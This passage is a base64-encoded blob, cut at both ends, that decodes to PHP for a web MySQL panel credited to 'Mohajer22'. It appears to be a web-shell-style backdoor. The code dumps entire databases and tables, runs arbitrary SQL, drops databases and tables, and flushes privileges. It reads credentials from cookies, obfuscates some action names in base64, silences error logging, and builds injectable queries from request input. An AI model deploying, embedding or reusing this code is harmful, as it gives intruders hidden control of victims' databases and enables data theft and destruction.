uIjsNCgkJZWNobyAiPG9wdGlvbj5DVVJEQVRFXG4iOw0KCQllY2hvICI8b3B0aW9uPkNVUlRJTUVcbiI7DQoJCWVjaG8gIjxvcHRpb24+RlJPTV9EQVlTXG4iOw0KCQllY2hvICI8b3B0aW9uPkZST01fVU5JWFRJTUVcbiI7DQoJCWVjaG8gIjxvcHRpb24+Tk9XXG4iOw0KCQllY2hvICI8b3B0aW9uPlBBU1NXT1JEXG4iOw0KCQllY2hvICI8b3B0aW9uPlBFUklPRF9BRERcbiI7DQoJCWVjaG8gIjxvcHRpb24+UEVSSU9EX0RJRkZcbiI7DQoJCWVjaG8gIjxvcHRpb24+VE9fREFZU1xuIjsNCgkJZWNobyAiPG9wdGlvbj5VU0VSXG4iOw0KCQllY2hvICI8b3B0aW9uPldFRUtEQVlcbiI7DQoJCWVjaG8gIjxvcHRpb24+UkFORFxuIjsNCgkJZWNobyAiPC9zZWxlY3Q+XG4iOw0KCQllY2hvICI8L3RkPlxuIjsNCgkJJHZhbHVlID0gaHRtbHNwZWNpYWxjaGFycygkZGF0YVskaV0pOw0KCQlpZiggJGNtZCA9PSAiYWRkIiApIHsNCgkJCSR0eXBlID0gc3RydG9rKCAkZmllbGR0eXBlLCAiICgsKVxuIiApOw0KCQkJaWYoICR0eXBlID09ICJlbnVtIiB8fCAkdHlwZSA9PSAic2V0IiApIHsNCgkJCQllY2hvICI8dGQ+XG4iOw0KCQkJCWlmKCAkdHlwZSA9PSAiZW51bSIgKQ0KCQkJCQllY2hvICI8c2VsZWN0IG5hbWU9JGZpZWxkbmFtZT5cbiI7DQoJCQkJZWxzZSBpZiggJHR5cGUgPT0gInNldCIgKQ0KCQkJCQllY2hvICI8c2VsZWN0IG5hbWU9JGZpZWxkbmFtZSBzaXplPTQgbXVsdGlwbGU+XG4iOw0KCQkJCXdoaWxlKCAkc3RyID0gc3RydG9rKCAiJyIgKSApIHsNCgkJCQkJZWNobyAiPG9wdGlvbj4kc3RyXG4iOw0KCQkJCQlzdHJ0b2soICInIiApOw0KCQkJCX0NCgkJCQllY2hvICI8L3NlbGVjdD5cbiI7DQoJCQkJZWNobyAiPC90ZD5cbiI7DQoJCQl9IGVsc2Ugew0KCQkJCWlmKCAkbGVuIDwgNDAgKQ0KCQkJCQllY2hvICI8dGQ+PGlucHV0IHR5cGU9dGV4dCBzaXplPTQwIG1heGxlbmd0aD0kbGVuIG5hbWU9JGZpZWxkbmFtZT48L3RkPlxuIjsNCgkJCQllbHNlDQoJCQkJCWVjaG8gIjx0ZD48dGV4dGFyZWEgY29scz00MCByb3dzPTMgbWF4bGVuZ3RoPSRsZW4gbmFtZT0kZmllbGRuYW1lPjwvdGV4dGFyZWE+XG4iOw0KCQkJfQ0KCQl9IGVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQkJJHR5cGUgPSBzdHJ0b2soICRmaWVsZHR5cGUsICIgKCwpXG4iICk7DQoJCQlpZiggJHR5cGUgPT0gImVudW0iIHx8ICR0eXBlID09ICJzZXQiICkgew0KCQkJCWVjaG8gIjx0ZD5cbiI7DQoJCQkJaWYoICR0eXBlID09ICJlbnVtIiApDQoJCQkJCWVjaG8gIjxzZWxlY3QgbmFtZT0kZmllbGRuYW1lPlxuIjsNCgkJCQllbHNlIGlmKCAkdHlwZSA9PSAic2V0IiApDQoJCQkJCWVjaG8gIjxzZWxlY3QgbmFtZT0kZmllbGRuYW1lIHNpemU9NCBtdWx0aXBsZT5cbiI7DQoJCQkJd2hpbGUoICRzdHIgPSBzdHJ0b2soICInIiApICkgew0KCQkJCQlpZiggJHZhbHVlID09ICRzdHIgKQ0KCQkJCQkJZWNobyAiPG9wdGlvbiBzZWxlY3RlZD4kc3RyXG4iOw0KCQkJCQllbHNlDQoJCQkJCQllY2hvICI8b3B0aW9uPiRzdHJcbiI7DQoJCQkJCXN0cnRvayggIiciICk7DQoJCQkJfQ0KCQkJCWVjaG8gIjwvc2VsZWN0PlxuIjsNCgkJCQllY2hvICI8L3RkPlxuIjsNCgkJCX0gZWxzZSB7DQoJCQkJaWYoICRsZW4gPCA0MCApDQoJCQkJCWVjaG8gIjx0ZD48aW5wdXQgdHlwZT10ZXh0IHNpemU9NDAgbWF4bGVuZ3RoPSRsZW4gbmFtZT0kZmllbGRuYW1lIHZhbHVlPVwiJHZhbHVlXCI+PC90ZD5cbiI7DQoJCQkJZWxzZQ0KCQkJCQllY2hvICI8dGQ+PHRleHRhcmVhIGNvbHM9NDAgcm93cz0zIG1heGxlbmd0aD0kbGVuIG5hbWU9JGZpZWxkbmFtZT4kdmFsdWU8L3RleHRhcmVhPlxuIjsNCgkJCX0NCgkJfQ0KCQllY2hvICI8L3RyPiI7DQoJfQ0KCWVjaG8gIjwvdGFibGU+PHA+XG4iOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdBZGQgRGF0YSc+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdFZGl0IERhdGEnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1idXR0b24gdmFsdWU9J0NhbmNlbCcgb25DbGljaz0naGlzdG9yeS5iYWNrKCknPlxuIjsNCgllY2hvICI8L2Zvcm0+XG4iOw0KfQ0KDQpmdW5jdGlvbiBtYW5hZ2VEYXRhX3N1Ym1pdCggJGNtZCApIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkZmllbGRuYW1lLCAkUEhQX1NFTEYsICRxdWVyeVN0ciwgJGVyck1zZzsNCgkkcFJlc3VsdCA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJJG51bSA9IG15c3FsX251bV9maWVsZHMoICRwUmVzdWx0ICk7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglpZiggJGNtZCA9PSAiYWRkIiApDQoJCSRxdWVyeVN0ciA9ICJJTlNFUlQgSU5UTyAkdGFibGVuYW1lIFZBTFVFUyAoIjsNCgllbHNlIGlmKCAkY21kID09ICJlZGl0IiApDQoJCSRxdWVyeVN0ciA9ICJSRVBMQUNFIElOVE8gJHRhYmxlbmFtZSBWQUxVRVMgKCI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bS0xOyAkaSsrICkgew0KCQkkZmllbGQgPSBteXNxbF9mZXRjaF9maWVsZCggJHBSZXN1bHQgKTsNCgkJJGZ1bmMgPSAkR0xPQkFMU1skZmllbGQtPm5hbWUuIl9mdW5jdGlvbiJdOw0KCQlpZiggJGZ1bmMgIT0gIiIgKQ0KCQkJJHF1ZXJ5U3RyIC49ICIgJGZ1bmMoIjsNCgkJaWYoICRmaWVsZC0+bnVtZXJpYyA9PSAxICkgew0KCQkJJHF1ZXJ5U3RyIC49ICRHTE9CQUxTWyRmaWVsZC0+bmFtZV07DQoJCQlpZiggJGZ1bmMgIT0gIiIgKQ0KCQkJCSRxdWVyeVN0ciAuPSAiKSwiOw0KCQkJZWxzZQ0KCQkJCSRxdWVyeVN0ciAuPSAiLCI7DQoJCX0gZWxzZSB7DQoJCQkkcXVlcnlTdHIgLj0gIiciIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXTsNCgkJCWlmKCAkZnVuYyAhPSAiIiApDQoJCQkJJHF1ZXJ5U3RyIC49ICInKSwiOw0KCQkJZWxzZQ0KCQkJCSRxdWVyeVN0ciAuPSAiJywiOw0KCQl9DQoJfQ0KCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCApOw0KCWlmKCAkZmllbGQtPm51bWVyaWMgPT0gMSApDQoJCSRxdWVyeVN0ciAuPSAkR0xPQkFMU1skZmllbGQtPm5hbWVdIC4gIikiOw0KCWVsc2UNCgkJJHF1ZXJ5U3RyIC49ICInIiAuICRHTE9CQUxTWyRmaWVsZC0+bmFtZV0gLiAiJykiOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIgLCAkbXlzcWxIYW5kbGUgKTsNCgkkZXJyTXNnID0gbXlzcWxfZXJyb3IoKTsNCgl2aWV3RGF0YSggIiIgKTsNCn0NCg0KZnVuY3Rpb24gZGVsZXRlRGF0YSgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkZmllbGRuYW1lLCAkUEhQX1NFTEYsICRxdWVyeVN0ciwgJGVyck1zZzsNCgkkcFJlc3VsdCA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJJG51bSA9IG15c3FsX251bV9maWVsZHMoICRwUmVzdWx0ICk7DQoJJGtleSA9ICIiOw0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCwgJGkgKTsNCgkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQlpZiggJGZpZWxkLT5udW1lcmljID09IDEgKQ0KCQkJCSRrZXkgLj0gJGZpZWxkLT5uYW1lIC4gIj0iIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXSAuICIgQU5EICI7DQoJCQllbHNlDQoJCQkJJGtleSAuPSAkZmllbGQtPm5hbWUgLiAiPSciIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXSAuICInIEFORCAiOw0KCX0NCgkka2V5ID0gc3Vic3RyKCAka2V5LCAwLCBzdHJsZW4oJGtleSktNCApOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJJHF1ZXJ5U3RyID0gICJERUxFVEUgRlJPTSAkdGFibGVuYW1lIFdIRVJFICRrZXkiOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIsICRteXNxbEhhbmRsZSApOw0KCSRlcnJNc2cgPSBteXNxbF9lcnJvcigpOw0KCXZpZXdEYXRhKCAiIiApOw0KfQ0KDQpmdW5jdGlvbiBmZXRjaF90YWJsZV9kdW1wX3NxbCgkdGFibGUpDQp7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwkZGJuYW1lOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJJHF1ZXJ5X2lkID0gbXlzcWxfcXVlcnkoIlNIT1cgQ1JFQVRFIFRBQkxFICR0YWJsZSIsJG15c3FsSGFuZGxlKTsNCgkkdGFibGVkdW1wID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5X2lkLCBNWVNRTF9BU1NPQyk7DQoJJHRhYmxlZHVtcCA9ICJEUk9QIFRBQkxFIElGIEVYSVNUUyAkdGFibGU7XG4iIC4gJHRhYmxlZHVtcFsnQ3JlYXRlIFRhYmxlJ10gLiAiO1xuXG4iOw0KCWVjaG8gJHRhYmxlZHVtcDsNCgkvLyBnZXQgZGF0YQ0KCSRyb3dzID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gJHRhYmxlIiwkbXlzcWxIYW5kbGUpOw0KCSRudW1maWVsZHM9bXlzcWxfbnVtX2ZpZWxkcygkcm93cyk7DQoJd2hpbGUgKCRyb3cgPSBteXNxbF9mZXRjaF9hcnJheSgkcm93cywgTVlTUUxfTlVNKSkNCgl7DQoJCSR0YWJsZWR1bXAgPSAiSU5TRVJUIElOVE8gJHRhYmxlIFZBTFVFUygiOw0KCQkkZmllbGRjb3VudGVyID0gLTE7DQoJCSRmaXJzdGZpZWxkID0gMTsNCgkJLy8gZ2V0IGVhY2ggZmllbGQncyBkYXRhDQoJCXdoaWxlICgrKyRmaWVsZGNvdW50ZXIgPCAkbnVtZmllbGRzKQ0KCQl7DQoJCQlpZiAoISRmaXJzdGZpZWxkKQ0KCQkJew0KCQkJCSR0YWJsZWR1bXAgLj0gJywgJzsNCgkJCX0NCgkJCWVsc2UNCgkJCXsNCgkJCQkkZmlyc3RmaWVsZCA9IDA7DQoJCQl9DQoJCQlpZiAoIWlzc2V0KCRyb3dbIiRmaWVsZGNvdW50ZXIiXSkpDQoJCQl7DQoJCQkJJHRhYmxlZHVtcCAuPSAnTlVMTCc7DQoJCQl9DQoJCQllbHNlDQoJCQl7DQoJCQkJJHRhYmxlZHVtcCAuPSAiJyIgLiBteXNxbF9lc2NhcGVfc3RyaW5nKCRyb3dbIiRmaWVsZGNvdW50ZXIiXSkgLiAiJyI7DQoJCQl9DQoJCX0NCgkJJHRhYmxlZHVtcCAuPSAiKTtcbiI7DQoJCWVjaG8gJHRhYmxlZHVtcDsNCgl9DQoJQG15c3FsX2ZyZWVfcmVzdWx0KCRyb3dzKTsNCn0NCg0KZnVuY3Rpb24gZHVtcCgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkYWN0aW9uLCAkZGJuYW1lLCAkdGFibGVuYW1lOw0KCWlmKCAkYWN0aW9uID09ICJkdW1wVGFibGUiICl7DQoJCWhlYWRlcigiQ29udGVudC1kaXNwb3NpdGlvbjogZmlsZW5hbWU9JHRhYmxlbmFtZS5zcWwiKTsNCgkJaGVhZGVyKCdDb250ZW50LXR5cGU6IHVua25vd24vdW5rbm93bicpOw0KCQlmZXRjaF90YWJsZV9kdW1wX3NxbCgkdGFibGVuYW1lKTsNCgkJZWNobyAiXG5cblxuIjsNCgkJZWNobyAiXHJcblxyXG5cclxuIyMjICR0YWJsZW5hbWUgVEFCTEUgRFVNUCBDT01QTEVURUQgIyMjIjsNCgkJZXhpdDsNCgl9ZWxzZXsNCgkJaGVhZGVyKCJDb250ZW50LWRpc3Bvc2l0aW9uOiBmaWxlbmFtZT0kZGJuYW1lLnNxbCIpOw0KCQloZWFkZXIoJ0NvbnRlbnQtdHlwZTogdW5rbm93bi91bmtub3duJyk7DQoJCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJCSRxdWVyeV9pZCA9IG15c3FsX3F1ZXJ5KCJTSE9XIHRhYmxlcyIsJG15c3FsSGFuZGxlKTsNCgkJd2hpbGUgKCRyb3cgPSBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnlfaWQsIE1ZU1FMX05VTSkpDQoJCXsNCgkJCQlmZXRjaF90YWJsZV9kdW1wX3NxbCgkcm93WzBdKTsNCgkJCQllY2hvICJcblxuXG4iOw0KCQkJCWVjaG8gIlxyXG5cclxuXHJcbiMjIyAkcm93WzBdIFRBQkxFIERVTVAgQ09NUExFVEVEICMjIyI7DQoJCQkJZWNobyAiXG5cblxuIjsNCgkJfQ0KCQllY2hvICJcclxuXHJcblxyXG4jIyMgJGRibmFtZSBEQVRBQkFTRSBEVU1QIENPTVBMRVRFRCAjIyMiOw0KCQlleGl0Ow0KCX0NCn0NCg0KZnVuY3Rpb24gdXRpbHMoKSB7DQoJZ2xvYmFsICRQSFBfU0VMRiwgJGNvbW1hbmQ7DQoJZWNobyAiPGgxPlV0aWxpdGllczwvaDE+XG4iOw0KCWlmKCAkY29tbWFuZCA9PSAiIiB8fCBzdWJzdHIoICRjb21tYW5kLCAwLCA1ICkgPT0gImZsdXNoIiApIHsNCgkJZWNobyAiPGhyPlxuIjsNCgkJZWNobyAiU2hvd1xuIjsNCgkJZWNobyAiPHVsPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3N0YXR1cyc+U3RhdHVzPC9hPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3ZhcmlhYmxlcyc+VmFyaWFibGVzPC9hPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3Byb2Nlc3NsaXN0Jz5Qcm9jZXNzbGlzdDwvYT5cbiI7DQoJCWVjaG8gIjwvdWw+XG4iOw0KCQllY2hvICJGbHVzaFxuIjsNCgkJZWNobyAiPHVsPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1mbHVzaF9ob3N0cyc+SG9zdHM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX2hvc3RzIiApIHsNCgkJCWlmKCBteXNxbF9xdWVyeSggIkZsdXNoIGhvc3RzIiApICE9IGZhbHNlICkNCgkJCQllY2hvICItIFN1Y2Nlc3MiOw0KCQkJZWxzZQ0KCQkJCWVjaG8gIi0gRmFpbCI7DQoJCX0NCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1mbHVzaF9sb2dzJz5Mb2dzPC9hPlxuIjsNCgkJaWYoICRjb21tYW5kID09ICJmbHVzaF9sb2dzIiApIHsNCgkJCWlmKCBteXNxbF9xdWVyeSggIkZsdXNoIGxvZ3MiICkgIT0gZmFsc2UgKQ0KCQkJCWVjaG8gIi0gU3VjY2VzcyI7DQoJCQllbHNlDQoJCQkJZWNobyAiLSBGYWlsIjsNCgkJfQ0KCQllY2hvICI8bGk+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj11dGlscyZjb21tYW5kPWZsdXNoX3ByaXZpbGVnZXMnPlByaXZpbGVnZXM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX3ByaXZpbGVnZXMiICkgew0KCQkJaWYoIG15c3FsX3F1ZXJ5KCAiRmx1c2ggcHJpdmlsZWdlcyIgKSAhPSBmYWxzZSApDQoJCQkJZWNobyAiLSBTdWNjZXNzIjsNCgkJCWVsc2UNCgkJCQllY2hvICItIEZhaWwiOw0KCQl9DQoJCWVjaG8gIjxsaT48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPXV0aWxzJmNvbW1hbmQ9Zmx1c2hfdGFibGVzJz5UYWJsZXM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX3RhYmxlcyIgKSB7DQoJCQlpZiggbXlzcWxfcXVlcnkoICJGbHVzaCB0YWJsZXMiICkgIT0gZmFsc2UgKQ0KCQkJCWVjaG8gIi0gU3VjY2VzcyI7DQoJCQllbHNlDQoJCQkJZWNobyAiLSBGYWlsIjsNCgkJfQ0KCQllY2hvICI8bGk+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj11dGlscyZjb21tYW5kPWZsdXNoX3N0YXR1cyc+U3RhdHVzPC9hPlxuIjsNCgkJaWYoICRjb21tYW5kID09ICJmbHVzaF9zdGF0dXMiICkgew0KCQkJaWYoIG15c3FsX3F1ZXJ5KCAiRmx1c2ggc3RhdHVzIiApICE9IGZhbHNlICkNCgkJCQllY2hvICItIFN1Y2Nlc3MiOw0KCQkJZWxzZQ0KCQkJCWVjaG8gIi0gRmFpbCI7DQoJCX0NCgkJZWNobyAiPC91bD5cbiI7DQoJfSBlbHNlIHsNCgkJJHF1ZXJ5U3RyID0gZXJlZ19yZXBsYWNlKCAiXyIsICIgIiwgJGNvbW1hbmQgKTsNCgkJJHBSZXN1bHQgPSBteXNxbF9xdWVyeSggJHF1ZXJ5U3RyICk7DQoJCWlmKCAkcFJlc3VsdCA9PSBmYWxzZSApIHsNCgkJCWVjaG8gIkZhaWwiOw0KCQkJcmV0dXJuOw0KCQl9DQoJCSRjb2wgPSBteXNxbF9udW1fZmllbGRzKCAkcFJlc3VsdCApOw0KCQllY2hvICI8cCBjbGFzcz1sb2NhdGlvbj4kcXVlcnlTdHI8L3A+XG4iOw0KCQllY2hvICI8aHI+XG4iOw0KCQllY2hvICI8dGFibGUgY2VsbHNwYWNpbmc9MSBjZWxscGFkZGluZz0yIGJvcmRlcj0wPlxuIjsNCgkJZWNobyAiPHRyPlxuIjsNCgkJZm9yKCAkaSA9IDA7ICRpIDwgJGNvbDsgJGkrKyApIHsNCgkJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCwgJGkgKTsNCgkJCWVjaG8gIjx0aD4iLiRmaWVsZC0+bmFtZS4iPC90aD5cbiI7DQoJCX0NCgkJZWNobyAiPC90cj5cbiI7DQoJCXdoaWxlKCAxICkgew0KCQkJJHJvd0FycmF5ID0gbXlzcWxfZmV0Y2hfcm93KCAkcFJlc3VsdCApOw0KCQkJaWYoICRyb3dBcnJheSA9PSBmYWxzZSApIGJyZWFrOw0KCQkJZWNobyAiPHRyPlxuIjsNCgkJCWZvciggJGogPSAwOyAkaiA8ICRjb2w7ICRqKysgKQ0KCQkJCWVjaG8gIjx0ZD4iLmh0bWxzcGVjaWFsY2hhcnMoICRyb3dBcnJheVskal0gKS4iPC90ZD5cbiI7DQoJCQllY2hvICI8L3RyPlxuIjsNCgkJfQ0KCQllY2hvICI8L3RhYmxlPlxuIjsNCgl9DQp9DQpmdW5jdGlvbiBmb290ZXJfaHRtbCgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkUEhQX1NFTEYsICRVU0VSTkFNRTsNCgllY2hvICI8aHI+XG4iOw0KCWVjaG8gIjxzcGFuIGNsYXNzPVwibmV3XCI+WyRVU0VSTkFNRV08L3NwYW4+IC0gXG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249YkdsemRFUkNjdz09Jz5EYXRhYmFzZSBMaXN0PC9hPiB8IFxuIjsNCglpZiggJHRhYmxlbmFtZSAhPSAiIiApDQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249bGlzdFRhYmxlcyZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+VGFibGUgTGlzdDwvYT4gfCAiOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMnPlV0aWxzPC9hPiB8XG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249bG9nb3V0Jz5Mb2dvdXQ8L2E+XG4iOw0KfQ0KLy8tLS0tLS0tLS0tLS0tIE1BSU4gLS0tLS0tLS0tLS0tLSAvLw0KZXJyb3JfcmVwb3J0aW5nKDApOw0KaW5pX3NldCAoJ2Rpc3BsYXlfZXJyb3JzJywgMCk7DQppbmlfc2V0ICgnbG9nX2Vycm9ycycsIDApOw0KaWYoICRhY3Rpb24gPT0gImxvZ29uIiB8fCAkYWN0aW9uID09ICIiIHx8ICRhY3Rpb24gPT0gImxvZ291dCIgKQ0KCWxvZ29uKCk7DQplbHNlIGlmKCAkYWN0aW9uID09ICJiRzluYjI1ZmMzVmliV2wwIiApDQoJbG9nb25fc3VibWl0KCk7DQplbHNlIGlmKCAkYWN0aW9uID09ICJkdW1wVGFibGUiIHx8ICRhY3Rpb24gPT0gImR1bXBEQiIgKSB7DQoJd2hpbGUoIGxpc3QoJHZhciwgJHZhbHVlKSA9IGVhY2goJEhUVFBfQ09PS0lFX1ZBUlMpICkgew0KCQlpZiggJHZhciA9PSAibXlzcWxfd2ViX2FkbWluX3VzZXJuYW1lIiApICRVU0VSTkFNRSA9ICR2YWx1ZTsNCgkJaWYoICR2YXIgPT0gIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIgKSAkUEFTU1dPUkQgPSAkdmFsdWU7DQoJCWlmKCAkdmFyID09ICJteXNxbF93ZWJfYWRtaW5faG9zdG5hbWUiICkgJEhPU1ROQU1FID0gJHZhbHVlOw0KCX0NCgkkbXlzcWxIYW5kbGUgPSBAbXlzcWxfY29ubmVjdCggJEhPU1ROQU1FLiI6MzMwNiIsICRVU0VSTkFNRSwgJFBBU1NXT1JEICk7DQoJZHVtcCgpOw0KfSBlbHNlIHsNCgl3aGlsZSggbGlzdCgkdmFyLCAkdmFsdWUpID0gZWFjaCgkSFRUUF9DT09LSUVfVkFSUykgKSB7DQoJCWlmKCAkdmFyID09ICJteXNxbF93ZWJfYWRtaW5fdXNlcm5hbWUiICkgJFVTRVJOQU1FID0gJHZhbHVlOw0KCQlpZiggJHZhciA9PSAibXlzcWxfd2ViX2FkbWluX3Bhc3N3b3JkIiApICRQQVNTV09SRCA9ICR2YWx1ZTsNCgkJaWYoICR2YXIgPT0gIm15c3FsX3dlYl9hZG1pbl9ob3N0bmFtZSIgKSAkSE9TVE5BTUUgPSAkdmFsdWU7DQoJfQ0KCWVjaG8gIjwhLS0iOw0KCSRteXNxbEhhbmRsZSA9IEBteXNxbF9jb25uZWN0KCAkSE9TVE5BTUUuIjozMzA2IiwgJFVTRVJOQU1FLCAkUEFTU1dPUkQgKTsNCgllY2hvICItLT4iOw0KCWlmKCAkbXlzcWxIYW5kbGUgPT0gZmFsc2UgKSB7DQoJCWVjaG8gIjx0YWJsZSB3aWR0aD0xMDAlIGhlaWdodD0xMDAlPjx0cj48dGQ+PGNlbnRlcj5cbiI7DQoJCWVjaG8gIjxoMT5Xcm9uZyBQYXNzd29yZCE8L2gxPlxuIjsNCgkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1sb2dvbic+TG9nb248L2E+XG4iOw0KCQllY2hvICI8L2NlbnRlcj48L3RkPjwvdHI+PC90YWJsZT5cbiI7DQoJfSBlbHNlIHsNCgkJaWYoICRhY3Rpb24gPT0gImJHbHpkRVJDY3c9PSIgKQ0KCQkJbGlzdERhdGFiYXNlcygpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJjcmVhdGVEQiIgKQ0KCQkJY3JlYXRlRGF0YWJhc2UoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcERCIiApDQoJCQlkcm9wRGF0YWJhc2UoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAibGlzdFRhYmxlcyIgKQ0KCQkJbGlzdFRhYmxlcygpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJjcmVhdGVUYWJsZSIgKQ0KCQkJY3JlYXRlVGFibGUoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcFRhYmxlIiApDQoJCQlkcm9wVGFibGUoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAidmlld1NjaGVtYSIgKQ0KCQkJdmlld1NjaGVtYSgpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJxdWVyeSIgKQ0KCQkJdmlld0RhdGEoICRxdWVyeVN0ciApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJhZGRGaWVsZCIgKQ0KCQkJbWFuYWdlRmllbGQoICJhZGQiICk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gImFkZEZpZWxkX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRmllbGRfc3VibWl0KCAiYWRkIiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJlZGl0RmllbGQiICkNCgkJCW1hbmFnZUZpZWxkKCAiZWRpdCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZWRpdEZpZWxkX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRmllbGRfc3VibWl0KCAiZWRpdCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcEZpZWxkIiApDQoJCQlkcm9wRmllbGQoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IiApDQoJCQl2aWV3RGF0YSggIiIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiYWRkRGF0YSIgKQ0KCQkJbWFuYWdlRGF0YSggImFkZCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiYWRkRGF0YV9zdWJtaXQiICkNCgkJCW1hbmFnZURhdGFfc3VibWl0KCAiYWRkIiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJlZGl0RGF0YSIgKQ0KCQkJbWFuYWdlRGF0YSggImVkaXQiICk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gImVkaXREYXRhX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRGF0YV9zdWJtaXQoICJlZGl0IiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJkZWxldGVEYXRhIiApDQoJCQlkZWxldGVEYXRhKCk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gInV0aWxzIiApDQoJCQl1dGlscygpOw0KCQlteXNxbF9jbG9zZSggJG15c3FsSGFuZGxlKTsNCgkJZm9vdGVyX2h0bWwoKTsNCgl9DQp9DQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5NeVNRTCBJbnRlcmZhY2UgKERldmVsb3BlZCBCeSBNb2hhamVyMjIpPC90aXRsZT4NCjxib2R5IGJnQ29sb3I9IzAwMDAwMCA+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KPCEtLQ0KcC5sb2NhdGlvbiB7DQoJY29sb3I6ICMwMEZGMDA7DQp9DQpoMSwgaDIsIGgzIHsNCgljb2xvcjogIzAwRkYwMDsNCn0NCnRoIHsNCgliYWNrZ3JvdW5kLWNvbG9yOiAjMjIyMjIyOw0KCWNvbG9yOiAjMDBGRjAwOw0KCWZvbnQtc2l6ZTogc21hbGw7DQp9DQp0ZCB7DQoJY29sb3I6ICMwMEZGMDA7DQoJYmFja2dyb3VuZC1jb2xvcjo